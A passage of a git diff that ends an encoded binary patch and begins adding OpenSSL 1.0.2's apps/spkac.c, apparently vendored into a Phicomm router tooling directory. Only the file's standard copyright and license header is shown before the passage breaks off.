zxVBthAnun{8;AVp`u<x`=fq!bclDRMhqtuy<FpK`q^`FLeH<{RZ->osufr;jn%(HP
zZAH>2pKD%CGQaF-Sz+pt5)KZ_XDqK5YkGIw0)Ml`pQ1WBRll=3x%(=uX%#8E<<&+X
z4&UzKm$9?<yv2pnSA2atbhvBmLaXKjONQHDDg}}(>y4X>KNufAWK#6V8+)2|O#FJK
z>eH?3qsQKmI?q0MUT>-i_!R%=0RNi7mHn)XzdiP}+trDs`plfaf5h+2yS4BxcFM$5
zV^d<6w(G(sB`kYRt{3#cG_XL+$)%=j?$T_>*L9cQeY4Im)z~emIk)Ha<Cnkr53g0F
zj{l>;?3e9duZjBF+BU0ohppr5NK)+%4IM%oI>a}02rD8vglZh(Ys70JqBRaqE@AOS
zq}sln*h!Ft7Lj~oBBJ|)L=zShr*R04*TjG@R1+UDT(9XD851%vzM%%Qv=cVLY+kld
zO}_{O=4NGZ6PTfcwxL5Lme3GO1vetW4_O@>7cn^4px1Qh=>4-_9bDA&B=n1n2+1dl
zt7;bCj^0p<{?R{Gy@T67>IduNBEp7|SV09OhX&yHFoQl`Vs();4q7eLNh8I_>h+;c
zAyQ0&K@$_EiPA^K#0@JV)zwD^$HwbJVP|lx6dj{!(WRZHf5c#YG=u@XiPr>2YZ9Ud
zM#l_^)`UdFhU?=r5c|-G{`z<WWDnJc#0`rzNOhwUA`KB}fbD2PViKYa!cf29P>La2
zR2;neNl~F8F7U?<UhYzORB(tCA0Dj5KlpNSua6sdt&21yJR&YKHYO%gii?QVM}<mp
zQK8!U&ish&g}6zf`uMsb{X*DQAF6kif&pk<JQ!sAo-W3Hux{K(4b({1gGTJ52KPgP
zqx6xH5y3`dd4O9q0%0~LRv#T7A1Q^#vkJgQ>+Aw9#s|ANyLm`)GKLMquoc+N*|WYB
z7a}_fTPYqIj(LhZQok^^550XzSVVj{9D{f91_p759l2u&ur^Zv@L&)L@32^OL23~f
z7ZcY|gAEfCYlwi$2pV;8aAbnMh*U)K9vmDI8Qd>YFQfQ|MOaH|Fky4C9o%#0d)Rbr
zm$jd94`KoPybakNuZl)g5YF;O(`ax9TTMfoO+%WE?eqBNiJ*OqBC*fgO=GOMXgH0C
zL|v`iaCyLJSZ*3{mp2aE!Pa3r*gQpetAd8NE89U$5!PIA0%``0$97m9`5sh<?+H&p
z7az=7Uf|_c!N}u<snN><{F@N3XBVm7Dev+VXAKcidWa*tB(YH=qT>yEY~wJEKH5kf
zW1=I6p^choA}UVgX4}}fn9zg}y#`t|JR(}JiG%#CE5N`Jn_yr$@KV=Ai)?WT(QwcY
z3V?19H;@fsvB7b{k&*gHkjKIWs|kY+l@JG=%P%HwpgvRsw%Hg9kxYnXXZ0{n$H4#}
zUBdw5O{hLD-Vhues)<A&YQTW435$z~BKcaz7#gxW0b(5FYx^~Xmka)Jg+IE6QfEGF
z8HRxe`Pt|mlb{I?9;^qmG4c9njR8h4eQ-QDs^P<;hDDTw5uzWb@oCqYoq*a!L>u&R
z(ZP`#Jzi0o$e7?zyhXw7LNic5OcR|D)ekbDf1Sc%Fval{PdGU_NzPgqS2y?i4Lm%9
z`|+_hI>sOmly%wN3_52l#=eMzgL7>i){)&T!5Gv?HV&Z)28ZF6sdaXChFfBod;`$L
zLc#I+kQj&}G-`-G9)@}Fm_<Xh9ob3_bzR)z#SLSigjK*>l4v_8jizl3s~Dq0A|fN9
z(KVql(byCDee!R)iZH@&RlFDES>jx2i`_r-$p{mGe4R2<g&}nGZ&_p``FVt9^7lxl
z%+${r@g`YB5*I7BqErM44Kf5)>k5ID9JC(sEOroeZU**{)Qjh!9!`0n6FVfZe_?D^
zgyVyQTLR8rVD94KR6mSvv|-4!Fm1t(|5HX7oc>kDs8APn_jQC3y(SLG8h#hmu)AnP
zs6LnxyaBNt9NAD37vf&m)uo<RJ`(pNb_(xBYzIa>9DVclJ!Lg=yg{HHF%}wyd4Q{p
zKx7eS#jP5~bB)+X4eqm~fxlkx8VfJU1YWpYjBjA&o5YsWFe3lK(}KhIfyFu$u`Wfd
zQ{l^1x~QEO7S+!GPxCj0D)a>(SAvgq;d|BKBC8&&8v3mfCCl4*LmUoBIJ5;1)N2ed
zaKypD3WFveoBHdc^>M)l7`zNH;1ATm6dC3WaKA9b#l#N#+1UR*;t_b&jO|Q3?8UZT
z>0VMxAD@OA$Iks=-kYHDbaHiauB&a3zz(&eU7Veq-D=8MHi1orZHMcRTej_tz48Du
zT$+yw7sz5V8QwuM8ES1(zE~lPsnGVw@r$*Xs^Xs(me##2EhKm=CAr}-BwXw$HMg{$
zY}&!nZi1Pwr6$qb&(hg6#8TsJY3FTe-Q3aw%ML{yB=`~oOK6*|poVQnB&{v2O?@ma
zaKXV;Jcfk7gCMoETx@DO9ZHq`S&Ix(C;WqXeC0ex@EFow{NsoIm~O*NXzv~}Nco-n
zCZGD-xxT>JZ^gj&Ag=ZUo9U*_E$yb5HMi8HnK!p|oLs=$(s@EbZ%dEFLM<(KXaX#E
zcm-JA>ulDoyk%x*f6G^$yTH~PNr`fn9w7F%bcD=c1Of(e0jv2Y2t5o7uXFP|X~r(T
zzn?KPw&u_0%-8_)GsB-qFeP?a+XAzJmkH?Iu%kf2J|dDC>pkK~-s0Cj(2mH@`U0?O
z@G_CG6gj=(+nTUN`_2mc*q=<Kg2r~jzJaL?1OoMA*^wk|<PKrq!*W+~F8Wj>I5vSe
zXgC-C`@%8mH*?PV8|-)IydVY~66<fUje-~25ecprmWIGzw6mD&Ssw(p5MHQvF34oY
z>*){9@A3M2%crF+oG<3wi*xLsXlE?vA`VA6_fqK3ajsG5Z*jhu2Vg85W6FdVi;sf8
z;aoJhC>O5{<_{0WSUARn@j~90bD=LOxCj`JQ)R*VF=S?`Cg)!KSlDqDT$W*BEHz==
zT=L>vZ2dXsSaRk&of$7Au%zL8p^O)l&hukyz8%iE85=VYi3>D|bD<MFopW(4w)43C
z1Kh62w}SJ<oQuU(n>ZiKxrT4?N9ysq=*y3V{uJk4oNM^@8t44b*bg%~cjhOAKOco2
zwwS!wU-$#<hu574?^ohFD$IC6V|<DUJ#5Xu&-{{^lox+--j3NZlMdhj0tx3Cm^7UC
z<sG3f9Am1<`C=>i80RCHT!fw%jdK){%*gm77;epscOXiU7ylXXBQpuVn*H}=CUIxT
zsYc9S9yG$eI9Ha?g7dmWi@U8jho4LQDFt#K`V)nFA?F<wygTRNJig*|5a+Q9uIGG=
zf)C_;qJj_NJWauea6VtbM{&;n^9A7yY!f*@rqHKwepbQLIe(<!vp9dR;PW~Etl&#H
z|E}OGIX7k7JV)1YUQod|b6!NjcXDo};Otu@QUS?U!85oXuMe6|ab8)$FK}L6!LM@e
ztl+mfZ=m20Id7`qS)A(>{3YiB3jUsRxj*LB;4A076?zkP|0p0uD0m^x6BN8S=i?N-
zB<E=gUY7H@3SOD><qGb=`8EZw%{hKmk0veW*A%<~=l2x63Fl80+=p{Hu6ZT+bN*4G
z59IuZf_LV;Alv5I>B+gJf(LV6TEY8sUP;06huZO7L{$Zk=Uk3cUb(|KcUI`fa4yFw
zPoK=WmqMS)xg4iF{WQ)46#Chmw^#6moOf05rJT!g%Cr9m=Rpen2F~>gzLj(QRcV@b
za~`MQ2RR?C;Kw+}U(cuM4CgZy{1WFY75qBqe=7K0&Sk&yN_fn9hC-js`8frD&AD7o
zo}G`JKUC=PH$SldJXdftc0Vs5$@%i^6z1H7-|xj4E6!~dycFl23SOS`J_=ri^XUp+
zgY#_)UYGL=3hv7JO$C?zC?Gvn@Mc{9Qo;Q=|E%C`I5$&FEjn>tT)}&CUPZzCao$A1
zBRC(c;IW)<Qt%<1-&gR_oWE4?WX_dS#L1i&Q%oIaaBivK^EmfV@Fkr4EBGqT+bH-3
z#>Klv(W@j$Ztnt82ZbL0!w>AYT^0NY=RFnt6z3xq{37T375qBqSqgrS^Dheil=DK0
zsr3uat1I|>&TA?7H_lrt=0B#a{R&8R75c)QcUS1GIIpkJm*#wsf>-1`P+_MU=aUrr
zT8tMpz8@1Urset|g`EbRPgU4y%I%2vKf+E6uAi&W2XKB&!8>w(PQiO{K2sRx+aS&p
z6+D#l`wBY)IWH;RQ1X0noR?GZVVoaV*dN3Bb_Gx3+(}_a{swOWsh5IJ=lWm;pUe4I
zh5bdGKU47KoX0EdtmS;Uf^X)0t%C33ytbm<4{%;i!H;r&Kw;+$=SLL$GUsO${3hoY
z6#N0_R}?&p^M?xlit{W5|Hyf^g8$&$hP=PU&=z3hLIJ6og3IG+0jafum*o0h3XZnS
zB>HY1i6oT+z4BT?j?cOB;|)}JGZo%Sg?Crs{Zx3k3LggC2A*WR<Nbj>{{{b(RP>Wo
z_^;f~pM1V8?EKETnC}U`p7YvleC5xNq1>G+_K&FW(<=Ou3cstupR4e9D!ed^NBOmH
zB^6#xh2#IvmY<y`D&@9T(YI6K_+P~3XTOgMU!cN$RQw51(f3#3Q7U{SOf~ZJGfqW6
zOofk8;S*H&6cs*0h0j;vzpL;qD*U7hzoWums_<_r+ychO{Nib=!YiwA{C^Ykv*WJ9
zy;QhPg?CZmeN^~B6+T3Tk5}O{RQLiFzEp*;R^eMz_#qX3RE1wv;W;Y&n+h)m_p|)k
z(N2ZeQsGTicsmsyrou<4@X0ECfeK%v!uP1~vnu?q3V)`;f2i;h@bh%}#o0lHJFD<U
zD%@Lzw^8AJRrm-Mo~FVVsqoDz{G<xMq{1Jm@Rut5s|qimav!l&;bm1g{w865?dYz;
zy;OLB3h$=ELsfW;3LmP%$Ek4R!edzH6oiY#Bv>zq%f+G%L2>$cSV|~G!|K|236=y$
z>ZAJ`!sDe*u#7RtPr|i!xc-i-K@=a{U+)wV9~bQ8EXBjhmUw-v6D)9xH^2h7SY&Xl
zb#LHSUy6lAc0qC}Kj-^N4-2GVbusD&^Cg`@u?hW*yJBaM*y)cuxM0_qMLv-8$oobK
z%f%SWhO0x3+2jK`o4k+N*dEKq_WI+>P#&asJa61b9vW;2hRV9RHefP543Y!LsE35h
z4B@<sGw!*tT`lgqvRxP4)z-&-tt(Twv3)ltVREgz6oOgh6ZP4Ft9+(`6b0)NS!+SA
z1`V{#2V9_rMqFV5b987BTd#~eVX*Ru`7Z=+S_zh@8*pVeZZSw~2dm9?*dl1B03T-w
z{%G-!EB<l8KkoR)4gY988Dt_CrgC8l7g@|SE==xHpD7!#zaH!_%j?SWy2>T6ysj*-
zE6eN3@<MH(EC@6HWqDm$UN@E(s)FvYylyP78_Vk^yUFspvAj?<RI<G8EU!Du>n_)d
z<#lIy-C15({SJC}me-x-b!T~D**oz1EN^|5w?4~TpXII3^44d0>$AM|S>F0AZv&PW
znhPv6V0jy`ybW011}tv_mbU@R+koY5!18*qydEsC2g~ch@_Mkm9xSg1%j?1Nda%46
zEUzca>&fzZvb>%wuP4jv$@0Rocks%S<@IEFJy~8@)`};z&MY_d75Rwe*E%x;T4!cK
z>&#4OotX`-Gc%%fmaS-ID_YqK^gOf)U7u}aE70NDk!(dPThYo^<i4hbs|h7?Z_~=%
z4c76>P_`oXIIY~}xJeh;mi*U6w&)`JB^M@lM6KKtd69Bg)Vj*9%3V?`_erhXDVZVJ
zsN6rbatGDQJyfo;T#VdXwQ_gW%KcRYfq5@?Uaj1FwQ~2>$~BU!2cs%hUGB_Uxi@R&
z?yQyjvsUiVTDeDS-Q|38pVrEqS}XTz7&D}xmH~myy#s;*{roz%=oHk+yLmv1APJYl
z21iQ$B4UDINww76KTsaV!=&KY*dRj`TW}5ERA6U93~`ZCaAa^?loS*M3&ukR28DzV
zgz+XKQtGca1j*w&uG<ZY)(?@Iw+-qS5$)11TAXA94;QkrhkZ*XC@MH2n%R#J3X6!;
zvt7&|Z-8~_aGQcf-a&BN35)12`E=;su2Uf7h=i{nfgmm<DprD}^+9M={=Q7VVR(Zx
zLiwvR9KyQG2wdnK)ULHpM{Q8Yjsg1MVGP8h`}(k8xIqR*=?&pAp=>2R`T#5OrLeHb
z1o&bHe2HlwE}@sgU~PW9q#qgqr$X_&CsG)A5YIdckHbwgdIsf%ffnz+unmcXW$#j`
zOGFU3&`$oQQ)~S&$+tyE7`zQZF!%>0z_NZl+y+7=Z%+9)3Gl4s!@n3K<Wk2LEqsj!
z9emu#zKe0cxu0>@$Gc-E;{nEveI*EYd|?GIe4RyRZj!Ezw@;8yr*1(J(NIU3y35ob
zNRWQ0e9$=-?u2@I-!B5Yk}+pUq&_$rVuhL6_l!E~ykV)Z1RJ~)b=CQI2xu1=7{CPb
z_l)qHMNkVCk!V<{9K<Wn04|OWq7WmbJce2rGvRq*fOnk!AyKe6n)S|~3B(^JB|o#^
z;7|pL(?gx04UO$Ui)U>?K?fg~pZtS%pr=_|P|(4<t#1%~J1ikICP@BL8HUcszn!i{
zhoG>?;QsMaVDnZ%(Gj68k<lz_{M=9N)I$E|iD)Ha0%hzHW(AQF*!Rp>pAHcf4vW*v
z*O0IL^%fO#*llBjL-9)(%ptDky#mYT?hwK?thZo4QhLa{4PK@=I!P@$bdbj+9HC<3
z;@S1ezaqeD0wa+j0WgM-O@eR$Vp(yADn*x+FMK=|58vCtfr@{p0DGTtAFoTnu`h{z
zXh*S&PO?y8NyeD*IvZ;U&pmNnDJFazdK+H&d)k=9dNzElis$OE=iHK11NJc?_k@?w
zYY{?1-V|PfH%ACb*s0C!w3RXAxQJTlaor~-)Zc-Z-~$mtLSOE}OYkuWA)($CUbwyz
z({y=bEO#V7UQIZD)Lnre?<Cv{_J#e!gk#yl|5Jo}6a7`fss9f+SNfl&qW?(r_hDc7
z<HMhqV|~$o!KZPK_8$_C>l!hkzB#;vek0+uUONc)A$s;p-rNqY*LhMdZI`RW4%I&<
z`uoKGSHd3?Zi9|P67{VE&x0|Q;~af|0xwZ7M}__t?{Bys5tCByrO+?ndU>7S-}T)T
z`jK4UPsM($Lf@F{hpXs!5dIka74<r&uv3BCk=K*`-OtAg{Q|5wB(aW38Heu*eFd&B
zgq;kMQeTR5%!a$)__4fx>+kxy3jIia+<<SD_7e!FahR;I(~BRAbvH^ozbo~;o@<GH
z+JD&pvJLeS^<w`66&xQ?(O*>9Z_NAgEfxJUr5<c!dZ(h7*K_3gBgSQU-G&@zI&RDB
zHe@}<LX3OM@c<Im3$Mqo@-UyflXKiWgO})U2MNz6{J6r7&|f7yhv=UWJM?;gPV{tq
zct`Zli5&~x-_d_x!kcrB*<KLdp6IFlZiKfWdU+jy98Wrq4JLY8u2_$wEO#2wQ~PrW
zr~WMD9PQ9@WB53S_4Olu4&fa2F9{z<^w^a|Kbb~&OQN5vVh2AT#f0VR;3e9357ECO
z{2bx034cWF(E4T*?oafuh#eXS{Jawr`qK(t!k-eHE8|d`=vx!LtBPJn^Z`WQh3N4+
z7@}PK+z}J{(*|CG<L82ykmKA&@NvWrZLd_K$2vIjez1`6Kw@XPik<yL-;U_Tx)^1A
z9uR$dqJO4hzW{u$g9+<}YuH7-igT{C?@09cT^^x#R?)X6`c6dOQAHn3^qq-*u!?>z
z(RU&GB`W$oMBkO@#X1yaeeV)|H==*4V&4=#zrlp@#JR4BPZ7?Q_Dd0c52CNAqIV?v
zo<#4gq8IB>(4SsJ-%&*$P3-q3`oSvtX++<L=;x~Fw-9|0(c|Z8n3VCkO7wl<yoe`$
zu7*je|3dV^a9-$5;d32KN<DtAh6&@-4_-oFRz>ed^dUswSViBJ=tGG<NJT%K==DTD
zUPZr<=);J9xr+V((f23%<0|^AL?2G{cUAP6guf;FSA@SK{2Q?!LAZHQIDn*VuL_)F
zdkuh>XfJyeePf~@Nc6rc`d&mIN%Z*n878GaxV{7v`V$2&;ZKr^egV-(6a6w3{eGg4
zA^Kw~`UgZGOZ3lF^zVs&5Yc~E(cAH*YFOVmqStV)j8AQ%k0*Lp6@6QxHxPXn6@4(#
zClGyvirzr<gNc5mihefH4<Y(RD*Dw#Ka}V<sp$6-{V<}>P|@Eb`r$;MsiGHOt;6;j
zLG%{I;Q-R#+KY44<9iFypIue-ZHayq(RWeN4<q`~L_bbN{~OVdA^H_6`oly|=cOkJ
zA4}|9Aa>}y^cvAqJ9h~mN9;UNvGbhhshxL(k0*A%s@O5L1Q8@`7iy<4;fZigw3jvK
z*uJ!0Wr&{IsYG}ZvE!g(rw-9mJFbK$6FUu6?06GBwWA|^0<jaQVy6qyQ#-v0|Ap8I
zRk1UW=&7AJ!Y2|t!&K~yC3<S-7s6ABohd4IW)VHLvw(0qFI}o)XEo7NJAV>R=bt-N
z?Cd9cYUe27^tw2sV&^i^Q#&^apG4yGK*dfL(NjCG2u~$;KC0OHLG;v40V~K139mbP
zKPtw#^7<-C^wdrT!fAY}sMv8NdTOU0;gi89alO}9vD1X;sU2U!(}<ncDt0;$J+;%F
z@F~PjUllw3iJsbtCY;76LB-BUqNjEe2~Q{fOj5Bkjp(VJIfT>qO^a0QtRQ-7XC2|R
zURzY`>?V3@=MdpjNxe>}*f~%1)Xr7Hrx81MRO~z^dTJ+!aQrMr^uxC*cD@ijwPRup
znIYlzH3MG44*TI6I96U?Rzy$jlqP&8u~U(Ar5*S`(OFX7Piqs7zcwuVaZ$13N%Yho
zFT#H%c3P^~X-o9fPG`br6Fa?B?1T_KwG&A=ohJ`cu``tDshu%|)BZd`#ZDU0Q#&&W
zr*`J6*!i94shvLvpF`raQN_-7qNjG)f2I!ku|Lcub~04#oK~@OiE#W)8_|DmsMxtr
z^wghB!sin^FIDV(Ao>MF|DAAZzg7tlLBi|eJ-mdUTFx;JIfQ!?{RhGWiGCsBJqgFp
zI)(kd#Lg$e!&P_`;h%|q6yaY8pTar%{~O^8i5|Z*C;Zt&IJL7!g&!yU8?keRb1Zie
z;Wvr?JK>KB|3Ua`!l^%Bh<$7`@jThw1`Z%$x%6{^;+&&47ha;im56>Z;nj&AzP4r5
zw;<ev@ScRj?_wMEV~G7F#QrqGe<yqnu|wNs8PP8#`n5!FM#{ZN_#2{sN$g-O@I5Ui
ztCI2-nK`l3kaLXZGI)u&H79ynZY1Hf+=+x!`?HCCEW0thFfAc`IUI{}vsCQls^}eT
znK{-URuDUNIma@o|6K{E{>Kwe{ZA(Lsh{bDV;RE#{VM#Xiv8zAPwm$#l~=Eo#J&sX
z%6hdV`c*{Vp6CmZb`K#Oe`8DdA5S>Fj$RV`c->Wy-ILxEjy{QXH9rWa<8Xn}az^ZL
zf51zWTa0tGLEpcZB6>HXuS>Wq@YC?ZRG-)>MC#Rw=&3&)311EQg+JYh9qP|O!XFX+
zP{N-Qo=kWq;WIfG;~4J-(h{P_|36vyvr(bvkH4g?D*7V|J;oK&2^IZqqQ`jdVQNWw
zK=g%)KOYqO1zi7CMQ>F`7GQnR{z$I3<sAK^_8k>^;ZI$nFGBqBR_J?i`+h3=9twS9
zt`AbtM=SKgpLn7#O8ognML(J7ixK^D75!?WFHZFPRP=|5-je9As_1VKy%o`$*vSFG
zcDW5N(GTr77wve9$E_OSp1?$ZYeG0OF+Q|ZaPd2h-8o0CHSuQ%;Ux$^M(kj}68>By
z9Q_g3OAg`GpAQNy{IMttnIWOphLl^KaO%$h&Xw^=AlwsdiR(R`aO%%o1sDFTBfJCH
z5$&>-bF}fA@biRIKg*Q^5hSIbRXImH_#2DDehtEH32#j7tbsg2??d#Zh`ue+dxE|K
zyf8%&PU8@-;35tSRP3)Nyfi6y58-79|42Cg2CMMjvb^k<GCpMqNB`|*ndC}1^}mUN
z3;zQ-M{QYBZWQ6Pz5XP2Xg}XeIQp}N`*W3W>d$=z7yg*@hCnU;riF-uFXzfQv?CnL
z-NVZrKsYVepx~n1*_@-cJSq1o(bM`qBpk~<!pr?mI4!qOMOlFUBNye?;v888Qtkkv
zr{yLPj^);Y7p8Q=X}NP1T$H<pbJSKO<(?p%wtMkPteC%Dr*?#+KR7qS)R1uMkFSCY
ze<C<XZ6)H*pF~gNu$OQww=ot9=_=v0-1`bH$}Lq{&WBq3%~sLhx^u4VZ+gP9Twgi6
zG=^|mZi<47a!+!OS`8`JS|b}&mRo^vEO(?Vlj;*r%k@%lQLce=)K($o?jU*^=Oct;
zxk>QCbVtKBtUu6lGZkEvTcL`qSC-qCb7g%a3CD6L%h{y~gwt}TD!3^32<OUjEvm`}
zmF3zJj^&=_<vI~g%k@xjQEoKnsI6*}*RM7aJ&p4|!m-@TyxePq({djuxG2}Inw(Kt
zZZFPF;WRBboNz4n7B6=^;k4Yz3NFe$#JRFub9>ofE!b2eaVX8X(x392qaAyquR-){
z;heZmU5MU+=$jBd*6R_xF!d(f9FE02u)l(fdQIRQwbhCJ{e;&b{0gx{<NSbd^k*i#
zFnuH39FB!Q1s&LF<Mk!{X~;Qh9Z9*PiJq1_iEu1;foxV<MmQ~Zy@HE!A8@WLw|ezF
zKWVuxgk!nOc)0<D({j5gxF~lL=gM-=5<M;V2H{w4CtmJ5!fClb6kL?+QbW#&TKvs!
z(ccDhuI#tt3CD7K@p2asPRm`P;G*0coTIiDDYufNY*1NlEyA(fNM5cl;k4Yg3NFeW
z&pB%GH^xMLj}kqN^F_k3TmvsRhj3c%2L%`9)~YFIWLi>gEa7zt|CMkj!dDSqkMIqg
zW88A!CF-?}@O6YAAa>|;stZK#OY}F1{srMLRrCdLAcTbVrFv_^or(Xo2-gzcoNyPy
z+Y(OW(1UZ)e?%O{6HeP}v4V^Cs$847&-|z5wo&1|2*=;J7v+v2oZ6X5xEs;0;T-)(
zKgIXOwi4b9xUj#6@TP<xCj1WJCkbCq_)X5S%)5l=5IvsDF@rylZ0pEd^z$RUgg@m7
zr~X$Z9Ir3_v619L_y%I95$9;*JK@cVek0*siJtc7fkcnC#C$TA=-o;DClLLg#C|%_
zQ~SRX{U)N{sG>he^qYzPIN=x{5zjNk4voWAqTfRFcL?7~_(K&tp9rV*DpnUVLlXT^
z#H|G97)u(rszkpH&I$i(6Fs%xi0HQyeRINh5Z;>borHHJd>7%toTHz#+<3yN|04;n
zPx?cW3ZKro7-w!lIheK)Jsp>h5Ix>U)-pBBe~F%shtG%}`@<ft|4j4^h@X;^EWrBG
z@za)Y52CNmxoBT8A8V-KVmu5cc07rlDTFs9e2$8pwM5^D=#LYQ-+>eT=MLdCo;k!m
zji*UHIS$Ht6;*IiFAvT!ZuB|85yJ8RCK3LeBX;PxdWG=aU`y!l6FYQV%_Mqi=Q+{i
z|D7T1d?tGA5B#!)2P}E@9ZkwDPB``*VaJ|utg~o$_|+qpMBGGtx^a$L8ix>~r~VHh
zd@tk?<t7k2G!7$)p4u5l^fV50h#q|s_s124?<3`|BYZ#MTL`D+W^j(Ssh@X<9?vy~
z7p8(*d5f$WX|EETV?3#SJHijZIT4@A#11XDI?+=*wTYg_ry0@He&R>?Xi{!R!VeNY
zfN-pv=qCmR7yV>0=gK&&A$scnCc+Pqa`zKEG!93Jp4vG@^fV3+h#q|s{p1zlhe^2~
z2|q&k55j4=C0#%S32jq99XJ=)k?1GEL{I1WVT5~;{xg`^Ve<i28mzG=dT*j1NA&2E
zXqWv&-<;@A5<RWg1;R7Hj_9Aah#gwrheS{9WD-4Xmv=;u^|Iyl`bzj1QmzGxAYnX@
z!b|v5nQ*MH=$|zeT*RRx=cuJ|=tK0>fB0XYS;BIU!Aq1IOYG1%3?X`IXC%?nILsh=
z^hxy3C4?U*<*p+91mPP9r{x~t9BorSuM<6<6ZJB2g9Av&d`Lej#yQ4;+Am4?NjN9$
zlp}U%xmAds+Nn<TG(HW99$mJD7bb7QX+LR8_$kl{fAoZ7-9$f$QE<^u=5wx$!wRCO
z{;wnaG%0r%u|wl<km#wMqeM^RaGU7SC(%!`2|q*1eM9(J!aoyE%e8a|5hS!t{nT(S
z#xW7kC<S*dz_LpT#EviNKO+=+;eQIzw;=kdL{HyW&L;dE6e;{!M(oge{(8cx{jDl?
z4iP=IbAss4lXA}!{a3>OBHWME>lU$df#{zQJ++ffcuQjEjf$ObL{IIQ)Q7?#Vf*Tc
z9ShE}eW^b-L{IIMAsqitJ`w*)Ds~)+p4zEPcq?KDeie=-r9VxHp4!n7PTMz-*trN6
zg`d5Mp0;lk(bMZ|2;sCJjwXBqu|J9M&4j0Oj<)Ih_qjxWiRc#-j^o}fcwt&e_(nJu
z^;)Z9e;d)$dhH{8E3uP7IIZtZVxPwCIpOqu^gCh)%N+?XOy3E|_iMuc5)IgC<8uZv
zK2#)}`csqeKZzaqAwZU}OzLM-qQ6Y^Iu(5nqTf#ReF?`h#C;@!@J&Q-Ae=t07)dyN
zUhxaz)Xo&b>GP09oGa_QiE!F3Cy5=*Bj%;o3CI2>-dDaL9QC4IJ`w&Gsc$afR|qfc
z0SA!K2EBf*I2ZR9VZS=zA0dzEC-7UAETR4?;f;uW+U_lgemT(x5PpsDAQd}9h#u=8
z{Fy*F#?2O9nC25s<F=e|8n?BC)3|NpTp71LL{IHsBAmwU4&m3qKjD8Su}|anhUjVB
zJ`;X}*eQk=GbHqd+G)r+wilgmG$VRC&j}!$K7Z?@!s7_X|Kmv1E1mEF!j}`?hVYAo
zKLlTe9UR*+VZH9bOK@C^jtTh#cnSVWg`*Y|p2kP#;{QdpKnO|jzPtlj%h<>lTgkvq
z!TT2Efbc@FpHx@|)IRd>+&^j`x%huDseR<)|H0J2J|@hLd?L5cKjt!WD{N>;&ho~{
z#s5diyN{8J|98?$p`Xs}>lAz*=j{}HDd*i3d@bjF6?`k_;R?Q&^H>Ex#raSLzsC7k
z1;5YvL<N7&`BVk}%=sJzFHl4Vixs>y=c^RF2Im_UT>O7wI}}{}Kcoi~T>L+z#}!=s
zKcwds+=G{UO~HLRzo+2sIL}mY@&7PtILGe9yA&fH3SN~Thby><i<ox^JDa&~rb3Tv
z@iB?G3H@TuMH~bd|KHFfIUDm4&x!v(h;?u{7JBjj2jQAGOoEI5KS*+l9~NZ@?gv{#
zoV*Ped+@8Q!A=JKP=n-zKg%vT^^1>}oZ@2GPqu?d>jXbSEg!-b#q1310d;~O5{6%`
zRd4}i8zJ!q`03}6n5ZayG!zmYW6(RbY}>gm`w3)z+&?<O34azJenWp4x26w=p9IC<
zBL3fyG++ZmqZrO4FJPE*`1mXz$y%|G+w$<jvDgb<H0?;0k2Hbuw#5I_#ue)(5W~=n
zCw1#mw&oL{T~MbRSt?ab3<um#RANN@L#Hl$0pD_CB^de%H+Dk27u!*AV=1;{`^87%
zyNeWb5X{p^H-F!Ze~X}9k2Tec@!mweK4nu<;(a&mmpJA>{89q#dyNK*rl_1jGXIOS
zw~Fudela&=NhVv>Syv?;JL$C+sLoghL4QYMh`;{dwFE{Hnfv|%p4$BXaFYP)6UW&K
zB;Ox?{#it|{9z-&QAFl3YohcJwfyt5_y?UB=I5i<=l_I_`5)0r8a4l<G(tDL$pdV}
zPkr2040?Q?y^JN9WSN?t9Lio5U)req*l*a<d)x)i6(615uG`FfE^<s?KP$!WTtbgO
z0b85@hMPW+tsm!~TN%UKyw-9PH}vEod_0Tf`drXFo@?rBmx#D058>-Uq;dCiQeD>Y
Me|r5q!z#(+Z?;lj^8f$<

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/spkac.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/spkac.c
new file mode 100644
index 0000000..8b06ec4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/spkac.c
@@ -0,0 +1,312 @@
+/* apps/spkac.c */
+
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999. Based on an original idea by Massimiliano Pala (madwolf@openca.org).
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
